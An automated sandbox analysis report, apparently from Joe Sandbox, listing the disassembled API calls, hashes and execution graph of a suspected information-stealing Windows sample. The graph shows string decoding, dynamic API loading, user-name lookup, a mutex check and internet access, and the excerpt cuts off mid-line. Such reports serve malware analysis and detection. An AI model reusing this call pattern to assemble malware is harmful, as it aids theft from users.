                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f080d8b6ae33b3b50391a2464a2cad1b1fed4e5a581bf215f9f6845d9d7d624a
                                              • Instruction ID: 4c29efa676948a52f9e55c5182812981a548882d9809b445e3cadc1fb605f01c
                                              • Opcode Fuzzy Hash: f080d8b6ae33b3b50391a2464a2cad1b1fed4e5a581bf215f9f6845d9d7d624a
                                              • Instruction Fuzzy Hash: 5E216F31200246AFFB63AF69DC809AB77E9BF113A4F044659E9959B1D0EB31ED408B90
                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32 ref: 0100E30C
                                                • Part of subcall function 0100CF52: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,01009F97,?,00000000,-00000008), ref: 0100CFFE
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0100E344
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0100E364
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                              • String ID:
                                              • API String ID: 158306478-0
                                              • Opcode ID: 537566dd929f2f9a9e8c376f634c3032f084eb16f4d41cca532a0f8ea3c25a52
                                              • Instruction ID: 1b762b87578a770672e1273da6991ebe07752202ee350a7ed129ef7d1ee85b01
                                              • Opcode Fuzzy Hash: 537566dd929f2f9a9e8c376f634c3032f084eb16f4d41cca532a0f8ea3c25a52
                                              • Instruction Fuzzy Hash: 811108B15056067E77132B75DC8CCBF7FADDE86194F004528F581E1180EA29DD004271
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00FF1FDD
                                              • int.LIBCPMT ref: 00FF1FF0
                                                • Part of subcall function 00FF2D36: std::_Lockit::_Lockit.LIBCPMT ref: 00FF2D47
                                                • Part of subcall function 00FF2D36: std::_Lockit::~_Lockit.LIBCPMT ref: 00FF2D61
                                              • std::_Facet_Register.LIBCPMT ref: 00FF2023
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00FF2039
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                              • String ID:
                                              • API String ID: 459529453-0
                                              • Opcode ID: 75e5be8f0673954b637e754ba52cae0eae5fa1735f24e6b76ce1b5f4802c52c1
                                              • Instruction ID: 7e6018e68726e8c9bf8066cde1aa8ab0b5449f2df8180e436eea02d12f07c49c
                                              • Opcode Fuzzy Hash: 75e5be8f0673954b637e754ba52cae0eae5fa1735f24e6b76ce1b5f4802c52c1
                                              • Instruction Fuzzy Hash: 2301A73390052CABCB24EB54DC569BE7768AF40760B140549FB01AB2B1EF78AE41E7D4
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00FF1F64
                                              • int.LIBCPMT ref: 00FF1F77
                                                • Part of subcall function 00FF2D36: std::_Lockit::_Lockit.LIBCPMT ref: 00FF2D47
                                                • Part of subcall function 00FF2D36: std::_Lockit::~_Lockit.LIBCPMT ref: 00FF2D61
                                              • std::_Facet_Register.LIBCPMT ref: 00FF1FAA
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00FF1FC0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                              • String ID:
                                              • API String ID: 459529453-0
                                              • Opcode ID: 814781ad2e9b26797b3bbdbbe4881b874193781c6d321f3679ef981ce5fa0f9a
                                              • Instruction ID: 156c533df1e767900ce4ed74a89fb535f648c972caad71744ff285a4fd2808f0
                                              • Opcode Fuzzy Hash: 814781ad2e9b26797b3bbdbbe4881b874193781c6d321f3679ef981ce5fa0f9a
                                              • Instruction Fuzzy Hash: E501A23290051CEBCB24EB64DC459BEB7A9AF40764B100559FA01AB2B1EF78AF41F7D0
                                              APIs
                                              • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,01012F25,00000000,00000001,00000000,?,?,0100A7B8,?,00000000,00000000), ref: 010145F6
                                              • GetLastError.KERNEL32(?,01012F25,00000000,00000001,00000000,?,?,0100A7B8,?,00000000,00000000,?,?,?,0100AD3F,00000000), ref: 01014602
                                                • Part of subcall function 010145C8: CloseHandle.KERNEL32(FFFFFFFE,01014612,?,01012F25,00000000,00000001,00000000,?,?,0100A7B8,?,00000000,00000000,?,?), ref: 010145D8
                                              • ___initconout.LIBCMT ref: 01014612
                                                • Part of subcall function 0101458A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,010145B9,01012F12,?,?,0100A7B8,?,00000000,00000000,?), ref: 0101459D
                                              • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,01012F25,00000000,00000001,00000000,?,?,0100A7B8,?,00000000,00000000,?), ref: 01014627
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                              • String ID:
                                              • API String ID: 2744216297-0
                                              • Opcode ID: 2f502f2c1c5cfe3ce0a5b3f81302961d19c05ce9db52c0bf16b476a668b7ee91
                                              • Instruction ID: 066d6a09ecb5fe6bc8f3882c5bb3476d5e8e726612a9e6160d4c51a7de083bbb
                                              • Opcode Fuzzy Hash: 2f502f2c1c5cfe3ce0a5b3f81302961d19c05ce9db52c0bf16b476a668b7ee91
                                              • Instruction Fuzzy Hash: 82F01C36400319FBCF632FA9DC0498A3F66FB083A1F404110FA9985124C77B8820AB91
                                              APIs
                                              • ReadFile.KERNEL32(?,00000048,00000002,?,00000000,00000048,00000000,00000000,?,?,0100C131), ref: 0100BA38
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID: @"$@"
                                              • API String ID: 2738559852-1249078637
                                              • Opcode ID: 468f0e4ee6174e12a7d82069cd9d339ffbbd99e69d88dee7562be50b8db6ad13
                                              • Instruction ID: 37d23add0cd0a4c7fc9dfda7e7b0114dca2f31b1ed4b4b28ffc56417ce76c218
                                              • Opcode Fuzzy Hash: 468f0e4ee6174e12a7d82069cd9d339ffbbd99e69d88dee7562be50b8db6ad13
                                              • Instruction Fuzzy Hash: 31512635A14206EBFB22CF9CD941AFDB7B0EF1A314F24415AE995A72D0E3749A80C751
                                              APIs
                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00FFCE5F
                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00FFCF13
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                              • String ID: csm
                                              • API String ID: 3480331319-1018135373
                                              • Opcode ID: 13a150872da12eaf801e59e9dc3c8673f565784738d8f5da71713f2b0ba2a057
                                              • Instruction ID: 3defc4e0cdc4907dd2b3399824fb592fc92afc306fbff260697e63b348bffd66
                                              • Opcode Fuzzy Hash: 13a150872da12eaf801e59e9dc3c8673f565784738d8f5da71713f2b0ba2a057
                                              • Instruction Fuzzy Hash: A341B530E0021D9BCF10DF68CC44ABEBBB5BF45324F148055EA15AB3A6D7359A15EBD1
                                              APIs
                                              • EncodePointer.KERNEL32(00000000,?), ref: 00FFD752
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EncodePointer
                                              • String ID: MOC$RCC
                                              • API String ID: 2118026453-2084237596
                                              • Opcode ID: fc9c898f4a1c0c1e968bd2fbbc24a0c05e2581cd8dabb3ddab9ff281161c1643
                                              • Instruction ID: 82da1c3d5597e54e3fdce2115df661825e5b82efd0ea7691d3cf3999accc7428
                                              • Opcode Fuzzy Hash: fc9c898f4a1c0c1e968bd2fbbc24a0c05e2581cd8dabb3ddab9ff281161c1643
                                              • Instruction Fuzzy Hash: 6C413772D0020DAFCF16DF94CD81AAEBBB6AF48354F148159FA04A6261D3359950EB51
                                              APIs
                                              • __alloca_probe_16.LIBCMT ref: 00FF60DD
                                              • RaiseException.KERNEL32(?,?,?,00FF5190,?,?,?,?,?,?,?,?,?,?,00FF5190,00000001), ref: 00FF6102
                                                • Part of subcall function 00FFB012: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,?,?,00FF560A,?,01021098,00FF1E57,?,00FF1E57), ref: 00FFB072
                                                • Part of subcall function 00FFE69B: IsProcessorFeaturePresent.KERNEL32(00000017,00FF1E2E,?,?,?,00FF3AA8,01058E0C,?,?,00FF2949,?,?,?,?,?,00FF143A), ref: 00FFE6B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                              • String ID: csm
                                              • API String ID: 1924019822-1018135373
                                              • Opcode ID: 4ddd93586c7321f9791b6630d2c0458fbc51f6834b2ac9ec533bd826f2116ea5
                                              • Instruction ID: 334f3febc6c200a8d9ec756ed5ec570588a56a87b5a9dea93a4a799743b1e875
                                              • Opcode Fuzzy Hash: 4ddd93586c7321f9791b6630d2c0458fbc51f6834b2ac9ec533bd826f2116ea5
                                              • Instruction Fuzzy Hash: 2821A932C0021C9BCF24DE95D945ABEB7B9AF04724F244419E606EB221CF34AD50EB81
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00FF23C1
                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00FF23F9
                                                • Part of subcall function 00FF67C3: _Yarn.LIBCPMT ref: 00FF67E2
                                                • Part of subcall function 00FF67C3: _Yarn.LIBCPMT ref: 00FF6806
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                              • String ID: bad locale name
                                              • API String ID: 1908188788-1405518554
                                              • Opcode ID: 8d6ccef34ecc00be40b6a8c61daf69feb5157e83aedaae8abbcf3e5293467c81
                                              • Instruction ID: ec7c9fc6ab8b40d85e4fc42bb0fce6f772931de658eb8837b95346f01f84b27c
                                              • Opcode Fuzzy Hash: 8d6ccef34ecc00be40b6a8c61daf69feb5157e83aedaae8abbcf3e5293467c81
                                              • Instruction Fuzzy Hash: 56F03071505B449E8330DF7A8881457FBE4BE28620390CE2FE2DEC3A22D734E544CB6A

                                              Execution Graph

                                              Execution Coverage:3.8%
                                              Dynamic/Decrypted Code Coverage:0.7%
                                              Signature Coverage:4.6%
                                              Total number of Nodes:2000
                                              Total number of Limit Nodes:33
                                              execution_graph 89709 418707 89733 40254e 89709->89733 89717 41872b 89831 410884 _EH_prolog lstrlenA 89717->89831 89720 410884 4 API calls 89721 418752 89720->89721 89722 410884 4 API calls 89721->89722 89723 418759 89722->89723 89835 4107c9 89723->89835 89725 418762 89726 4187a5 OpenEventA 89725->89726 89727 4187b2 89726->89727 89728 41878b CloseHandle Sleep 89726->89728 89730 4187ba CreateEventA 89727->89730 90034 410935 89728->90034 89839 417d8e _EH_prolog 89730->89839 90035 4024d7 memset 89733->90035 89735 402562 89736 4024d7 9 API calls 89735->89736 89737 402573 89736->89737 89738 4024d7 9 API calls 89737->89738 89739 402584 89738->89739 89740 4024d7 9 API calls 89739->89740 89741 402595 89740->89741 89742 4024d7 9 API calls 89741->89742 89743 4025a6 89742->89743 89744 4024d7 9 API calls 89743->89744 89745 4025b7 89744->89745 89746 4024d7 9 API calls 89745->89746 89747 4025c8 89746->89747 89748 4024d7 9 API calls 89747->89748 89749 4025d9 89748->89749 89750 4024d7 9 API calls 89749->89750 89751 4025ea 89750->89751 89752 4024d7 9 API calls 89751->89752 89753 4025fb 89752->89753 89754 4024d7 9 API calls 89753->89754 89755 40260c 89754->89755 89756 4024d7 9 API calls 89755->89756 89757 40261d 89756->89757 89758 4024d7 9 API calls 89757->89758 89759 40262e 89758->89759 89760 4024d7 9 API calls 89759->89760 89761 40263f 89760->89761 89762 4024d7 9 API calls 89761->89762 89763 402650 89762->89763 89764 4024d7 9 API calls 89763->89764 89765 402661 89764->89765 89766 4024d7 9 API calls 89765->89766 89767 402672 89766->89767 89768 4024d7 9 API calls 89767->89768 89769 402683 89768->89769 89770 4024d7 9 API calls 89769->89770 89771 402694 89770->89771 89772 4024d7 9 API calls 89771->89772 89773 4026a5 89772->89773 89774 4024d7 9 API calls 89773->89774 89775 4026b6 89774->89775 89776 4024d7 9 API calls 89775->89776 89777 4026c7 89776->89777 89778 4024d7 9 API calls 89777->89778 89779 4026d8 89778->89779 89780 4024d7 9 API calls 89779->89780 89781 4026e9 89780->89781 89782 4024d7 9 API calls 89781->89782 89783 4026fa 89782->89783 89784 4024d7 9 API calls 89783->89784 89785 40270b 89784->89785 89786 4024d7 9 API calls 89785->89786 89787 40271c 89786->89787 89788 4024d7 9 API calls 89787->89788 89789 40272d 89788->89789 89790 4024d7 9 API calls 89789->89790 89791 40273e 89790->89791 89792 4024d7 9 API calls 89791->89792 89793 40274f 89792->89793 89794 4024d7 9 API calls 89793->89794 89795 402760 89794->89795 89796 4024d7 9 API calls 89795->89796 89797 402771 89796->89797 89798 4024d7 9 API calls 89797->89798 89799 402782 89798->89799 89800 4024d7 9 API calls 89799->89800 89801 402793 89800->89801 89802 4024d7 9 API calls 89801->89802 89803 4027a4 89802->89803 89804 4024d7 9 API calls 89803->89804 89805 4027b5 89804->89805 89806 4024d7 9 API calls 89805->89806 89807 4027c6 89806->89807 89808 4024d7 9 API calls 89807->89808 89809 4027d7 89808->89809 89810 4024d7 9 API calls 89809->89810 89811 4027e8 89810->89811 89812 4187e7 LoadLibraryA 89811->89812 89813 4189f1 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 89812->89813 89814 4187ff 89812->89814 89815 418a61 89813->89815 89816 418a4f GetProcAddress 89813->89816 89821 418820 20 API calls 89814->89821 89817 418a93 89815->89817 89818 418a6a GetProcAddress GetProcAddress 89815->89818 89816->89815 89819 418a9c GetProcAddress 89817->89819 89820 418aae 89817->89820 89818->89817 89819->89820 89822 418ab7 GetProcAddress 89820->89822 89823 418ac9 89820->89823 89821->89813 89822->89823 89824 418ad2 GetProcAddress GetProcAddress 89823->89824 89825 418719 89823->89825 89824->89825 89826 41070b 89825->89826 89827 410719 89826->89827 89828 41073b 89827->89828 89829 410731 lstrcpy 89827->89829 89830 4109b3 GetProcessHeap HeapAlloc GetUserNameA 89828->89830 89829->89828 89830->89717 89833 4108c4 89831->89833 89832 4108e9 89832->89720 89833->89832 89834 4108d6 lstrcpy lstrcat 89833->89834 89834->89832 89837 4107df 89835->89837 89836 410808 89836->89725 89837->89836 89838 410800 lstrcpy 89837->89838 89838->89836 89840 417da2 89839->89840 89841 41070b lstrcpy 89840->89841 89842 417db5 89841->89842 90056 414229 _EH_prolog 89842->90056 89844 417dc5 90058 4142d8 _EH_prolog 89844->90058 89846 417dd4 90060 41077f lstrlenA 89846->90060 89849 41077f 2 API calls 89850 417df8 89849->89850 90064 4027ef 89850->90064 89856 417f0a 89857 4107c9 lstrcpy 89856->89857 89858 417f1c 89857->89858 89859 41070b lstrcpy 89858->89859 89860 417f3b 89859->89860 89861 410884 4 API calls 89860->89861 89862 417f54 89861->89862 90654 410810 _EH_prolog 89862->90654 89865 4107c9 lstrcpy 89866 417f7d 89865->89866 89867 417fa4 CreateDirectoryA 89866->89867 90658 4010b1 _EH_prolog 89867->90658 89875 417fed 89876 4107c9 lstrcpy 89875->89876 89877 417fff 89876->89877 89878 4107c9 lstrcpy 89877->89878 89879 418011 89878->89879 90781 410742 89879->90781 89882 410884 4 API calls 89883 418035 89882->89883 89884 4107c9 lstrcpy 89883->89884 89885 418042 89884->89885 89886 410810 3 API calls 89885->89886 89887 418061 89886->89887 89888 4107c9 lstrcpy 89887->89888 89889 41806e 89888->89889 89890 418089 InternetOpenA 89889->89890 90785 410935 89890->90785 89892 4180a5 InternetOpenA 89893 410742 lstrcpy 89892->89893 89894 4180d5 89893->89894 89895 41070b lstrcpy 89894->89895 89896 4180ef 89895->89896 90786 4112c5 _EH_prolog GetWindowsDirectoryA 89896->90786 89899 410742 lstrcpy 89900 418118 89899->89900 90805 403af5 _EH_prolog 89900->90805 89902 418122 90941 412f2f _EH_prolog 89902->90941 89904 41812a 89905 41070b lstrcpy 89904->89905 89906 41815e 89905->89906 89907 4010b1 2 API calls 89906->89907 89908 418176 89907->89908 90961 405c89 _EH_prolog 89908->90961 89910 418180 91140 41296c _EH_prolog 89910->91140 89912 418188 89913 41070b lstrcpy 89912->89913 89914 4181b0 89913->89914 89915 4010b1 2 API calls 89914->89915 89916 4181c8 89915->89916 89917 405c89 46 API calls 89916->89917 89918 4181d2 89917->89918 91148 412745 _EH_prolog 89918->91148 89920 4181da 89921 41070b lstrcpy 89920->89921 89922 418202 89921->89922 89923 4010b1 2 API calls 89922->89923 89924 41821a 89923->89924 89925 405c89 46 API calls 89924->89925 89926 418224 89925->89926 91159 4128a0 _EH_prolog 89926->91159 89928 41822c 89929 4010b1 2 API calls 89928->89929 89930 418240 89929->89930 91168 415a32 _EH_prolog 89930->91168 89933 410742 lstrcpy 89934 418259 89933->89934 89935 41070b lstrcpy 89934->89935 89936 418273 89935->89936 91510 4041b2 _EH_prolog 89936->91510 89938 41827c 89939 4010b1 2 API calls 89938->89939 89940 4182b1 89939->89940 91529 40f98a _EH_prolog 89940->91529 89942 4182b6 90034->89726 90040 40245c 90035->90040 90039 402536 memset 90039->89735 90052 419710 90040->90052 90045 4118fa 90046 4024be CryptStringToBinaryA 90045->90046 90047 4024d0 strcat GetProcessHeap RtlAllocateHeap 90046->90047 90048 402308 90047->90048 90049 40231b 90048->90049 90050 40238b ??_U@YAPAXI 90049->90050 90051 4023a6 90050->90051 90051->90039 90053 402469 memset 90052->90053 90054 4118fa 90053->90054 90055 40249e CryptStringToBinaryA 90054->90055 90055->90045 90057 41423f 90056->90057 90057->89844 90059 4142ee 90058->90059 90059->89846 90062 410797 90060->90062 90061 4107c2 90061->89849 90062->90061 90063 4107b8 lstrcpy 90062->90063 90063->90061 90065 4024d7 9 API calls 90064->90065 90066 4027f9 90065->90066 90067 4024d7 9 API calls 90066->90067 90068 40280a 90067->90068 90069 4024d7 9 API calls 90068->90069 90070 40281b 90069->90070 90071 4024d7 9 API calls 90070->90071 90072 40282c 90071->90072 90073 4024d7 9 API calls 90072->90073 90074 40283d 90073->90074 90075 4024d7 9 API calls 90074->90075 90076 40284e 90075->90076 90077 4024d7 9 API calls 90076->90077 90078 40285f 90077->90078 90079 4024d7 9 API calls 90078->90079 90080 402870 90079->90080 90081 4024d7 9 API calls 90080->90081 90082 402881 90081->90082 90083 4024d7 9 API calls 90082->90083 90084 402892 90083->90084 90085 4024d7 9 API calls 90084->90085 90086 4028a3 90085->90086 90087 4024d7 9 API calls 90086->90087 90088 4028b4 90087->90088 90089 4024d7 9 API calls 90088->90089 90090 4028c5 90089->90090 90091 4024d7 9 API calls 90090->90091 90092 4028d6 90091->90092 90093 4024d7 9 API calls 90092->90093 90094 4028e7 90093->90094 90095 4024d7 9 API calls 90094->90095 90096 4028f8 90095->90096 90097 4024d7 9 API calls 90096->90097 90098 402909 90097->90098 90099 4024d7 9 API calls 90098->90099 90100 40291a 90099->90100 90101 4024d7 9 API calls 90100->90101 90102 40292b 90101->90102 90103 4024d7 9 API calls 90102->90103 90104 40293c 90103->90104 90105 4024d7 9 API calls 90104->90105 90106 40294d 90105->90106 90107 4024d7 9 API calls 90106->90107 90108 40295e 90107->90108 90109 4024d7 9 API calls 90108->90109 90110 40296f 90109->90110 90111 4024d7 9 API calls 90110->90111 90112 402980 90111->90112 90113 4024d7 9 API calls 90112->90113 90114 402991 90113->90114 90115 4024d7 9 API calls 90114->90115 90116 4029a2 90115->90116 90117 4024d7 9 API calls 90116->90117 90118 4029b3 90117->90118 90119 4024d7 9 API calls 90118->90119 90120 4029c4 90119->90120 90121 4024d7 9 API calls 90120->90121 90122 4029d5 90121->90122 90123 4024d7 9 API calls 90122->90123 90124 4029e6 90123->90124 90125 4024d7 9 API calls 90124->90125 90126 4029f7 90125->90126 90127 4024d7 9 API calls 90126->90127 90128 402a08 90127->90128 90129 4024d7 9 API calls 90128->90129 90130 402a19 90129->90130 90131 4024d7 9 API calls 90130->90131 90132 402a2a 90131->90132 90133 4024d7 9 API calls 90132->90133 90134 402a3b 90133->90134 90135 4024d7 9 API calls 90134->90135 90136 402a4c 90135->90136 90137 4024d7 9 API calls 90136->90137 90138 402a5d 90137->90138 90139 4024d7 9 API calls 90138->90139 90140 402a6e 90139->90140 90141 4024d7 9 API calls 90140->90141 90142 402a7f 90141->90142 90143 4024d7 9 API calls 90142->90143 90144 402a90 90143->90144 90145 4024d7 9 API calls 90144->90145 90146 402aa1 90145->90146 90147 4024d7 9 API calls 90146->90147 90148 402ab2 90147->90148 90149 4024d7 9 API calls 90148->90149 90150 402ac3 90149->90150 90151 4024d7 9 API calls 90150->90151 90152 402ad4 90151->90152 90153 4024d7 9 API calls 90152->90153 90154 402ae5 90153->90154 90155 4024d7 9 API calls 90154->90155 90156 402af6 90155->90156 90157 4024d7 9 API calls 90156->90157 90158 402b07 90157->90158 90159 4024d7 9 API calls 90158->90159 90160 402b18 90159->90160 90161 4024d7 9 API calls 90160->90161 90162 402b29 90161->90162 90163 4024d7 9 API calls 90162->90163 90164 402b3a 90163->90164 90165 4024d7 9 API calls 90164->90165 90166 402b4b 90165->90166 90167 4024d7 9 API calls 90166->90167 90168 402b5c 90167->90168 90169 4024d7 9 API calls 90168->90169 90170 402b6d 90169->90170 90171 4024d7 9 API calls 90170->90171 90172 402b7e 90171->90172 90173 4024d7 9 API calls 90172->90173 90174 402b8f 90173->90174 90175 4024d7 9 API calls 90174->90175 90176 402ba0 90175->90176 90177 4024d7 9 API calls 90176->90177 90178 402bb1 90177->90178 90179 4024d7 9 API calls 90178->90179 90180 402bc2 90179->90180 90181 4024d7 9 API calls 90180->90181 90182 402bd3 90181->90182 90183 4024d7 9 API calls 90182->90183 90184 402be4 90183->90184 90185 4024d7 9 API calls 90184->90185 90186 402bf5 90185->90186 90187 4024d7 9 API calls 90186->90187 90188 402c06 90187->90188 90189 4024d7 9 API calls 90188->90189 90190 402c17 90189->90190 90191 4024d7 9 API calls 90190->90191 90192 402c28 90191->90192 90193 4024d7 9 API calls 90192->90193 90194 402c39 90193->90194 90195 4024d7 9 API calls 90194->90195 90196 402c4a 90195->90196 90197 4024d7 9 API calls 